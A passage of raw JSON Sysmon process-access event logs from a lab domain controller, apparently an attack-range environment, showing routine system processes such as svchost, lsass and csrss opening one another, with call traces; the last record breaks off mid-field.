{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6095,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6096,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6097,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6098,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6099,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6100,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6101,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6102,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-00107B240B00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00107B240B00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6103,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 